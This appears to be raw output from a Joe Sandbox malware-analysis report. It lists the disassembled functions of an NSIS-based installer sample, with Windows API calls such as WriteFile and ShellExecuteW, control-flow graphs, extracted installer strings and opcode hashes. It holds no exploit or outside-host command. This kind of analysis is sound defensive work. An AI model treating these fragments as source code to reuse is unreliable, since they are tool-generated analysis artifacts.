                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                    • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                    • API String ID: 608394941-1650083594
                                                                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,232,232,00000000,00000000,232,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                    • String ID: 232$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                    • API String ID: 4286501637-2656113216
                                                                                                    • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                    • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                    Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                    Strings
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                    • Inst, xrefs: 0040366C
                                                                                                    • soft, xrefs: 00403675
                                                                                                    • Error launching installer, xrefs: 004035D7
                                                                                                    • Null, xrefs: 0040367E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                    • API String ID: 4283519449-527102705
                                                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                    • API String ID: 651206458-1535804072
                                                                                                    • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                    • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GlobalFree.KERNELBASE(00715CD8), ref: 00402387
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                    • String ID: 232$Exch: stack < %d elements$Pop: stack empty
                                                                                                    • API String ID: 1459762280-3464832006
                                                                                                    • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                    • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    • GlobalFree.KERNELBASE(00715CD8), ref: 00402387
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3376005127-0
                                                                                                    • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                    • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2568930968-0
                                                                                                    • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                    • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                    • String ID: 232$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                    • API String ID: 247603264-3569438738
                                                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                    • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                    • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                    Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
